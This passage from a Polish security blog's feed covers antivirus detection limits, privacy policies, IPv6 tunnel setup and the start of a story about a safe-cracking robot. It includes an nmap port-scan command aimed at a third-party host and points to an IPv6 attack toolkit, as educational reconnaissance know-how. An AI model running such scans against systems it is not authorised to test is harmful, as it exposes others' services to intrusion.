&lt;code&gt;Process = PoisonIvy&lt;/code&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;
Mimo, że metody heurystyczne dają nam pewną nadzieję na wykrycie nieznanych do tej pory zagrożeń, to oczywiście nie dają nam absolutnie żadnej gwarancji na stuprocentową skuteczność wykrywania oraz nie są wolne od zagrożenie generowania fałszywych alarmów.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Wiedząc już co nieco o metodach stosowanych przez współczesne antywirusy w celu wykrycia obecności złośliwego oprogramowania, możemy już teraz być pewni, że &lt;a href=&quot;http://www.hcsl.pl/2011/01/kaspersky-najlepszym-antywirusem-na.html&quot;&gt;zapewnienia producentów&lt;/a&gt; tego typu oprogramowania o niemal całkowitej nieomylności ich produktów są wyssane z palca. Absolutnie żadne rozwiązanie antywirusowe nie daje nam obecnie gwarancji na obronę przed każdą infekcją. Jak również mogliśmy się przekonać, metody stosowane w celu wykrycia złośliwego oprogramowania są niejednokrotnie dość wymagające obliczeniowo, co z kolei tłumaczy znane chyba każdemu użytkownikowi antywirusów spowolnienie działania całego objętego ochroną systemu...&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Wniosek? Współczesne programy antywirusowe są całkiem skuteczne i zazwyczaj w przypadku swobodnego surfowania oraz pobierania rozmaitości z Internetu, warto jednak z nich korzystać. Zawsze należy jednak również pamiętać o ich ograniczeniach, a nawet &lt;a href=&quot;http://www.hcsl.pl/2009/08/aktualizacje-oprogramowania-grozniejsze.html&quot;&gt;realnych zagrożeniach&lt;/a&gt; związanych z ich codziennym wykorzystaniem.&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hcseclab.blogspot.com/feeds/2792848039809454426/comments/default' title='Komentarze do posta'/><link rel='replies' type='text/html' href='http://hcseclab.blogspot.com/2011/01/w-jaki-sposob-antywirusy-rozpoznaja.html#comment-form' title='Komentarze (0)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4511012464226103155/posts/default/2792848039809454426'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4511012464226103155/posts/default/2792848039809454426'/><link rel='alternate' type='text/html' href='http://hcseclab.blogspot.com/2011/01/w-jaki-sposob-antywirusy-rozpoznaja.html' title='W jaki sposób antywirusy rozpoznają złośliwe programy?'/><author><name>\m/ojtek</name><uri>http://www.blogger.com/profile/00686678747901186941</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3kPKADUZjOVHLatr652Rn3sSYbK4nJahwcOl4VKk7SqP2zGIxUqZnxpvl45cvn_NGlAw7lyEV4CDIE58SyCxwGnRy1rEZNCjgKWu5NO0BCnsw-9s3cNevdmM3puj1RJ4/s220/P1010377.JPG'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZ_IsPloEzFd5esqFN_dmNN4MKsNJj4qKKGBwbbT8QAivMKhRqMd9lUCXxROH3Ml7VRQHwSh5eMBzfT1WI_OSm09zX0bwE5KvbCnGCbSxVGwUAzovuIpA_LcLkRsXXYsGKJFESIRoufao/s72-c/Virus.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4511012464226103155.post-3093739579631994708</id><published>2011-01-28T20:24:00.003+01:00</published><updated>2011-01-28T20:28:50.488+01:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Anonimowość"/><category scheme="http://www.blogger.com/atom/ns#" term="Inne"/><category scheme="http://www.blogger.com/atom/ns#" term="Newsy"/><category scheme="http://www.blogger.com/atom/ns#" term="Wywiad informatyczny"/><category scheme="http://www.blogger.com/atom/ns#" term="Zbieranie informacji"/><title type='text'>Dlaczego nie czytamy polityk prywatności? [infografika]</title><content type='html'>&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;a href=&quot;http://www.hcsl.pl/2011/01/dlaczego-nie-czytamy-polityk.html&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 0em; margin-right: 0em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgRZTs4zuPVpFtZDK-vvYWN2GHmgGpb-ZcBUGnK4H5QlE64zvGkriz9q-C1RUkq9OWmG1ZU8gqmvnB34Sddb1TZDS7pPOrq-qimoNFCZNn2NZSL1yNdAUlDQVpr9ORDskehI1qr9Dastw/s1600/privacy.png&quot; /&gt;&lt;/a&gt;Rejestrując się w ramach rozmaitych serwisów internetowych, zazwyczaj jesteśmy zmuszeni do zaakceptowania regulaminu, w tym &lt;a href=&quot;http://www.hcsl.pl/2009/08/polityka-prywatnosci-hcsl-zostaa.html&quot;&gt;polityki prywatności&lt;/a&gt;. To właśnie w tym dokumencie możemy niejednokrotnie znaleźć zapisy takie, jak informacja o tym, że dane na nasz temat mogą być swobodnie wykorzystywane, a czasem nawet sprzedawane firmom trzecim. Dlaczego więc pomimo &lt;a href=&quot;http://www.hcsl.pl/2010/05/przerazajaca-erozja-polityki.html&quot;&gt;coraz większych zagrożeń dla naszej prywatności&lt;/a&gt;, zazwyczaj w ogóle nie czytamy tych postanowień, a jedynie klikamy &quot;&lt;i&gt;&lt;b&gt;zgadzam się&quot;&lt;/b&gt;&lt;/i&gt;? Jak się okazuje, odpowiedź na to pytanie jest całkiem prosta...
&lt;br /&gt;
&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: right;&quot;&gt;
&lt;/div&gt;
&lt;div style=&quot;margin-left: 1em; margin-right: 1em; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqjezFTvzTk2X8Hu0Z4i_IvxDmLIpV8KrO85IP2klDe_jh0xi23_d5-gLKknzr0p_xonHxjo4YT8LD0cN18LIqBG6xP6dprUGBjyeXAIZgdrGJ0FYpYUgyMoJ16RksCQqeHzMq_FuIboo/s1600/privacy01.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;-webkit-text-decorations-in-effect: none; color: black;&quot;&gt;&lt;/span&gt;&lt;/a&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqjezFTvzTk2X8Hu0Z4i_IvxDmLIpV8KrO85IP2klDe_jh0xi23_d5-gLKknzr0p_xonHxjo4YT8LD0cN18LIqBG6xP6dprUGBjyeXAIZgdrGJ0FYpYUgyMoJ16RksCQqeHzMq_FuIboo/s1600/privacy01.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;br /&gt;&lt;img border=&quot;0&quot; height=&quot;640&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqjezFTvzTk2X8Hu0Z4i_IvxDmLIpV8KrO85IP2klDe_jh0xi23_d5-gLKknzr0p_xonHxjo4YT8LD0cN18LIqBG6xP6dprUGBjyeXAIZgdrGJ0FYpYUgyMoJ16RksCQqeHzMq_FuIboo/s640/privacy01.jpg&quot; width=&quot;351&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hcseclab.blogspot.com/feeds/3093739579631994708/comments/default' title='Komentarze do posta'/><link rel='replies' type='text/html' href='http://hcseclab.blogspot.com/2011/01/dlaczego-nie-czytamy-polityk.html#comment-form' title='Komentarze (0)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4511012464226103155/posts/default/3093739579631994708'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4511012464226103155/posts/default/3093739579631994708'/><link rel='alternate' type='text/html' href='http://hcseclab.blogspot.com/2011/01/dlaczego-nie-czytamy-polityk.html' title='Dlaczego nie czytamy polityk prywatności? [infografika]'/><author><name>\m/ojtek</name><uri>http://www.blogger.com/profile/00686678747901186941</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3kPKADUZjOVHLatr652Rn3sSYbK4nJahwcOl4VKk7SqP2zGIxUqZnxpvl45cvn_NGlAw7lyEV4CDIE58SyCxwGnRy1rEZNCjgKWu5NO0BCnsw-9s3cNevdmM3puj1RJ4/s220/P1010377.JPG'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgRZTs4zuPVpFtZDK-vvYWN2GHmgGpb-ZcBUGnK4H5QlE64zvGkriz9q-C1RUkq9OWmG1ZU8gqmvnB34Sddb1TZDS7pPOrq-qimoNFCZNn2NZSL1yNdAUlDQVpr9ORDskehI1qr9Dastw/s72-c/privacy.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4511012464226103155.post-3190063360835634823</id><published>2011-01-23T15:50:00.007+01:00</published><updated>2011-01-23T16:31:27.115+01:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Bezpieczeństwo sieci komputerowych"/><category scheme="http://www.blogger.com/atom/ns#" term="Bezpieczeństwo systemów operacyjnych"/><category scheme="http://www.blogger.com/atom/ns#" term="Etyczny hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="Narzędzia"/><category scheme="http://www.blogger.com/atom/ns#" term="Obrona - Atak"/><category scheme="http://www.blogger.com/atom/ns#" term="Testy penetracyjne"/><title type='text'>Wstęp do (nie)bezpieczeństwa IP Next Generation</title><content type='html'>&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;a href=&quot;http://www.hcsl.pl/2011/01/wstep-do-niebezpieczenstwa-ip-next.html&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 0em; margin-right: 0em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmtpesH1LG6HNkezTSP347UMd2SNoZBZhOpawT-bIjCROZvc1qjVgsRzHzIlHI70wl9U2grt4WRhl0i_-hGqO2VS0e3CQ73iKcby3BW25Nh7NZ-x4Iwbr_lfTmU7829mSQWY5K5LBhwt4/s1600/IPv6.png&quot; /&gt;&lt;/a&gt;Od wielu lat słyszymy już, że pula dostępnych adresów IP (w czwartej wersji tegoż protokołu) nieubłaganie wyczerpuje się. Zgodnie z niektórymi raportami organizacji IANA, sytuacja jest już co najmniej krytyczna. Niezależnie jednak od słuszności tego typu ocen i przewidywań, z pewnością już dziś warto zainteresować się protokołem IPv6. Spójrzmy więc na kilka praktycznych kwestii związanych z tematyką bezpieczeństwa IP Next Generation.&lt;br /&gt;
&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Protokół IPv6 (ang. &lt;i&gt;Internet Protocol version 6&lt;/i&gt;), znany również jako IPNG (ang. &lt;i&gt;Internet Protocol Next Generation&lt;/i&gt;), nie jest oczywiście niczym nowym, bowiem wyniki pierwszych prac nad tym standardem pojawiły się już w 1995 roku. Pomimo upływu wielu lat, wciąż na co dzień korzystamy jednak z IPv4, natomiast wiedza na temat IPv6 (nawet wśród osób zawodowo związanych z IT i/lub sieciami komputerowymi) jest zazwyczaj znikoma. Spójrzmy więc na kilka podstawowych informacji na temat internetowego protokołu nowej generacji oraz spróbujmy w sposób praktyczny rozpocząć własną przygodę z bezpieczeństwem IPv6.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Prace nad IPv6 rozpoczęły się przede wszystkim ze względu na problem małej ilości adresów obsługiwanych przez starą wersję protokołu. Otóż IPv4 wykorzystuje 32-bitowe adresowanie, co daje nam do dyspozycji (w praktyce nie wszystkie adresy możemy wykorzystać na potrzeby globalnej komunikacji) zaledwie nieco ponad 4 miliardy (2^32=4294967296) adresów. Problem ten ostatecznie ma rozwiązać 128-bitowe adresowanie zastosowane w IPv6, dzięki któremu otrzymujemy naprawdę ogromną (2^128) przestrzeń adresową. Pomijając dalsze nudne rozważania teoretyczne, przejdźmy do praktyki.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Adres IPv6 reprezentowany jest w postaci heksadecymalnej, z dwukropkiem co 16 bitów, np. 2001:0db8:0000:0000:0000:0000:1428:57ab. Dozwolone jest skrócenie jednego bloku zer (nie dotyczy zer na końcach sekcji) na podwójny dwukropek, początkowe zera w grupach również mogą być opuszczane, w związku z czym poniższe sposoby zapisu są prawidłowe i równoznaczne:&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;2001:0db8:0000:0000:0000:0000:1428:57ab&lt;/li&gt;
&lt;li&gt;2001:0db8:0:0:0:0:1428:57ab&lt;/li&gt;
&lt;li&gt;2001:0db8:0:0::1428:57ab&lt;/li&gt;
&lt;li&gt;2001:0db8::1428:57ab&lt;/li&gt;
&lt;li&gt;2001:db8::1428:57ab&lt;/li&gt;
&lt;/ul&gt;
&lt;div&gt;
Adres IPv6 może zostać zapisany w notacji CIDR, np. 2002:0db8:1234::/48 (gdzie 48 oznacza prefiks). Jeżeli zaś zachodzi potrzeba podania portu docelowego (np. w adresie URL), adres IPv6 otaczany jest nawiasami kwadratowymi, przykładowo:&lt;/div&gt;
&lt;div&gt;
&lt;ul&gt;
&lt;li&gt;http://[2001:0db8:85a3:08d3:1319:8a2e:0370:7344]:443/&lt;/li&gt;
&lt;/ul&gt;
&lt;div&gt;
Skoro jednak nasz ISP nadal zapewnia nam adres oraz komunikację jedynie z wykorzystaniem IPv4, to w jaki sposób możemy już dziś wkroczyć do świata IPv6? Okazuje się, że jest to całkiem proste. Wystarczy tylko skorzystać z darmowej usługi utworzenia tunelu IPv4-IPv6. Przykładem takiej usługi jest &lt;a href=&quot;http://www.tunnelbroker.net/&quot;&gt;Hurricane Electric Free IPv6 Tunnel&lt;/a&gt;. Po dokonaniu rejestracji, wszystko sprowadza się praktycznie do podania naszego publicznego adresu IPv4 (w celu pomyślnego utworzenia tunelu, wskazany przez nas interfejs sieciowy musi grzecznie odpowiadać na komunikaty &lt;i&gt;ICMP Echo Request&lt;/i&gt;, czyli mówiąc po ludzku musi być pingowalny):&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjv9mmYnZb83N6lWWIGmbP50cxjiHJhFlkrJiy2xeyUU64zrkjkJ_qBah4M1nYv_Bg79C9vvVTHff5xFCjGFtzn5XviOrwYCAdF5bBiCxKv9gNK4a6ycoSMvJtiC0xptzNfY4wK2au4f54/s1600/IPv6+01.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;312&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjv9mmYnZb83N6lWWIGmbP50cxjiHJhFlkrJiy2xeyUU64zrkjkJ_qBah4M1nYv_Bg79C9vvVTHff5xFCjGFtzn5XviOrwYCAdF5bBiCxKv9gNK4a6ycoSMvJtiC0xptzNfY4wK2au4f54/s400/IPv6+01.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div&gt;
W taki oto prosty sposób powstanie nasz tunel:&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjzRWMXNDzCt5rTrnZ1zkpOLDgbofJNEaSkBhvHyrQ5KdzT8GLVIHu9bKnB4dxbCHPNOBp95KKdzjvO_UNwkwb8F9FDAj1c9kvjixFGce5gD_HNhwJzf2wkgIYLldZpyRPdnNIkZk7bxk/s1600/IPv6+02.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;300&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjzRWMXNDzCt5rTrnZ1zkpOLDgbofJNEaSkBhvHyrQ5KdzT8GLVIHu9bKnB4dxbCHPNOBp95KKdzjvO_UNwkwb8F9FDAj1c9kvjixFGce5gD_HNhwJzf2wkgIYLldZpyRPdnNIkZk7bxk/s400/IPv6+02.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div&gt;
Teraz musimy już tylko zachęcić nasz system operacyjny do skorzystania z tunelu. Przykładowo w Windows 7 osiągniemy to za pomocą następujących poleceń:&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;code&gt;netsh interface teredo set state disabled&lt;/code&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;code&gt;netsh interface ipv6 add v6v4tunnel IP6Tunnel 79.191.225.158 216.66.84.46&lt;/code&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;code&gt;netsh interface ipv6 add address IP6Tunnel 2001:470:1f14:12a7::2&lt;/code&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;code&gt;netsh interface ipv6 add route ::/0 IP6Tunnel 2001:470:1f14:12a7::1&lt;/code&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;
Natomiast systemy spod znaku sympatycznego pingwina, powinny zadowolić się następującą sekwencją poleceń:&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;code&gt;modprobe ipv6&lt;/code&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;code&gt;ip tunnel add he-ipv6 mode sit remote 216.66.84.46 local 79.191.225.158 ttl 255&lt;/code&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;code&gt;ip link set he-ipv6 up&lt;/code&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;code&gt;ip addr add 2001:470:1f14:12a7::2/64 dev he-ipv6&lt;/code&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;code&gt;ip route add ::/0 dev he-ipv6&lt;/code&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;code&gt;ip -f inet6 addr&lt;/code&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
W tej chwili powinniśmy już mieć kontakt ze światem IPv6, co możemy przetestować na przykładzie któregoś z adresów znalezionych &lt;a href=&quot;http://sixy.ch/&quot;&gt;tutaj&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
Jak się okazuje, większość narzędzi znanych i wykorzystywanych przez osoby zainteresowane bezpieczeństwem systemów i sieci komputerowych, od dawna wspiera już IPv6. Spójrzmy na kilka prostych przykładów:&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;ping6 ipv6.google.com&lt;/li&gt;
&lt;li&gt;ping -6 ipv6.google.com&lt;/li&gt;
&lt;li&gt;nslookup -type=AAAA ipv6.google.com&lt;/li&gt;
&lt;li&gt;nmap -PN -6 -p1-10000 ipv6.google.com&lt;/li&gt;
&lt;li&gt;http://[2001:4860:800f::67]/ (w taki sposób należy wpisywać w przeglądarkach internetowych adresy IPv6)&lt;/li&gt;
&lt;/ul&gt;
&lt;div&gt;
Przy pomocy powyższych podstawowych narzędzi możemy przykładowo stwierdzić, że dany host za pośrednictwem IPv6 udostępnia całemu światu więcej rozmaitych usług w stosunku do usług dostępnych po IPv4 (np. w wyniku błędnej konfiguracji samego systemu lub reguł zapory), co może potencjalnie zostać wykorzystane przez intruza.&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Dostępnych jest oczywiście również wiele bardziej zaawansowanych narzędzi. Przykładowo twórcy &lt;a href=&quot;http://www.hcsl.pl/2010/06/thc-hydra-57-jest-juz-dostepna.html&quot;&gt;słynnej hydry&lt;/a&gt; (grupa &lt;a href=&quot;http://freeworld.thc.org/&quot;&gt;The Hacker&#39;s Choice&lt;/a&gt;) udostępnili pod &lt;a href=&quot;http://freeworld.thc.org/thc-ipv6/&quot;&gt;tym adresem&lt;/a&gt; cały pakiet interesujących i niedawno zaktualizowanych narzędzi do testowania bezpieczeństwa IPv6. Warto jednak zauważyć, że specyfika protokołu nowej generacji może znacznie utrudniać lub nawet uniemożliwiać niektóre testy bezpieczeństwa lub ataki. Wyobraźmy sobie przykładowo wykonanie zadania przeskanowania całego zakresu (lub choćby obszernego fragmentu) adresów IPv6!&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Wszystkich, których temat bezpieczeństwa IPv6 naprawdę zainteresował, zachęcam ponadto do odwiedzenia witryny &lt;a href=&quot;https://sites.google.com/site/ipv6security/&quot;&gt;IPv6 Security&lt;/a&gt;, w ramach której Joe Klein zgromadził sporą dawkę interesujących informacji z tegoż zakresu. Warto również zainteresować się prezentacją z niedawnej konferencji 27th Chaos Communication Congress o wdzięcznym tytule &lt;a href=&quot;http://events.ccc.de/congress/2010/Fahrplan/attachments/1808_vh_thc-recent_advances_in_ipv6_insecurities.pdf&quot;&gt;Recent advances in IPv6 insecurities&lt;/a&gt;:&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;iframe allowfullscreen=&quot;&quot; class=&quot;youtube-player&quot; frameborder=&quot;0&quot; height=&quot;390&quot; src=&quot;http://www.youtube.com/embed/c7hq2q4jQYw?rel=0&quot; title=&quot;YouTube video player&quot; type=&quot;text/html&quot; width=&quot;640&quot;&gt;&lt;/iframe&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Na koniec zachęcam wszystkich czytelników do podzielenia się własnymi dotychczasowymi doświadczeniami z zakresu (nie)bezpieczeństwa IPv6!&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hcseclab.blogspot.com/feeds/3190063360835634823/comments/default' title='Komentarze do posta'/><link rel='replies' type='text/html' href='http://hcseclab.blogspot.com/2011/01/wstep-do-niebezpieczenstwa-ip-next.html#comment-form' title='Komentarze (0)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4511012464226103155/posts/default/3190063360835634823'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4511012464226103155/posts/default/3190063360835634823'/><link rel='alternate' type='text/html' href='http://hcseclab.blogspot.com/2011/01/wstep-do-niebezpieczenstwa-ip-next.html' title='Wstęp do (nie)bezpieczeństwa IP Next Generation'/><author><name>\m/ojtek</name><uri>http://www.blogger.com/profile/00686678747901186941</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3kPKADUZjOVHLatr652Rn3sSYbK4nJahwcOl4VKk7SqP2zGIxUqZnxpvl45cvn_NGlAw7lyEV4CDIE58SyCxwGnRy1rEZNCjgKWu5NO0BCnsw-9s3cNevdmM3puj1RJ4/s220/P1010377.JPG'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmtpesH1LG6HNkezTSP347UMd2SNoZBZhOpawT-bIjCROZvc1qjVgsRzHzIlHI70wl9U2grt4WRhl0i_-hGqO2VS0e3CQ73iKcby3BW25Nh7NZ-x4Iwbr_lfTmU7829mSQWY5K5LBhwt4/s72-c/IPv6.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4511012464226103155.post-769448750438161194</id><published>2011-01-19T22:00:00.002+01:00</published><updated>2011-01-21T01:59:40.450+01:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Inne"/><title type='text'>Jak z pomocą robota zhakować sejf?</title><content type='html'>&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;a href=&quot;http://www.hcsl.pl/2011/01/jak-z-pomoca-robota-zhakowac-sejf.html&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 0em; margin-right: 0em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_GcsHBiJbYkCJU3133lcuWFtP1wnmW07UT-li44dtetJb7yzZ08zEZ7mlB_lU493O6mQGr1S0Vu_pfRQG-Eu4myxzrIMkxdhFD29sfQQRyD02JLk1wJk4xdVi2r8j4EMdZyS3eNM38VQ/s1600/safe.png&quot; /&gt;&lt;/a&gt;Ataki typu &lt;a href=&quot;http://www.hcsl.pl/2010/05/nowe-narzedzie-do-testowania-hase.html&quot;&gt;brute force&lt;/a&gt;, czyli metody opierające się na sukcesywnym sprawdzaniu wszystkich możliwych kombinacji haseł lub kodów dostępowych, są oczywiście świetnie znane wszystkim osobom zainteresowanym tematyką bezpieczeństwa IT. Jak się jednak okazuje, tego typu zautomatyzowane ataki mogą również z powodzeniem zostać zastosowane w zupełnie zaskakujący sposób. Oto krótka historia o tym, jak komputerowi maniacy poradzili sobie z pewnym sejfem!&lt;br /&gt;
&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Wszystko zaczęło się od tego, że dwóch studentów ze słynnego Massachusetts Institute of Technology weszło w posiadanie pewnego tajemniczego sejfu. Kierowani wrodzoną (a może wyuczoną przez amerykańskie szkolnictwo wyższe?) ciekawością, postanowili opracować skuteczną metodę otwierania tego typu sejfów. Tak oto powstał działający prototyp robota zdolnego do odnalezienia właściwej kombinacji w ciągu zaledwie kilku godzin i to właśnie za pomocą ataku sprowadzającego się do sprawdzenia wszystkich możliwych kombinacji:&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;object height=&quot;505&quot; width=&quot;640&quot;&gt;&lt;param name=&quot;movie&quot; value=&quot;http://www.youtube.com/v/69g_ieT3Wes?fs=1&amp;amp;hl=pl_PL&amp;amp;rel=0&quot;&gt;




&lt;/param&gt;
&lt;param name=&quot;allowFullScreen&quot; value=&quot;true&quot;&gt;




&lt;/param&gt;
&lt;param name=&quot;allowscriptaccess&quot; value=&quot;always&quot;&gt;




&lt;/param&gt;
&lt;embed src=&quot;http://www.youtube.com/v/69g_ieT3Wes?fs=1&amp;amp;hl=pl_PL&amp;amp;rel=0&quot; type=&quot;application/x-shockwave-flash&quot; allowscriptaccess=&quot;always&quot; allowfullscreen=&quot;true&quot; width=&quot;640&quot; height=&quot;505&quot;&gt;&lt;/embed&gt;&lt;/object&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Powyższe zadanie wcale nie było takie proste. Sejf był wyposażony w zamek &lt;a href=&quot;http://www.sargentandgreenleaf.com/MC-8500.php&quot;&gt;Sargent and Greenleaf 8500&lt;/a&gt;. Jest to jeden z najbardziej zaawansowanych zamków mechanicznych, a liczba wszystkich możliwych kombinacji to okrągły milion. Manualne testowanie poszczególnych kombinacji nie było więc oczywiście zbyt dobrym pomysłem. Tutaj świetnie sprawdził się zbudowany na tę okazję robot. Jednak nawet tak zautomatyzowany atak typu &lt;i&gt;brute force&lt;/i&gt; wymagałby wielu długich godzin. Kolejnym kluczem do osiągnięcia założonego celu w krótkim czasie okazała się więc &lt;a href=&quot;http://www.crypto.com/papers/safelocks.pdf&quot;&gt;odpowiednia optymalizacja&lt;/a&gt; przestrzeni testowanych kombinacji.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
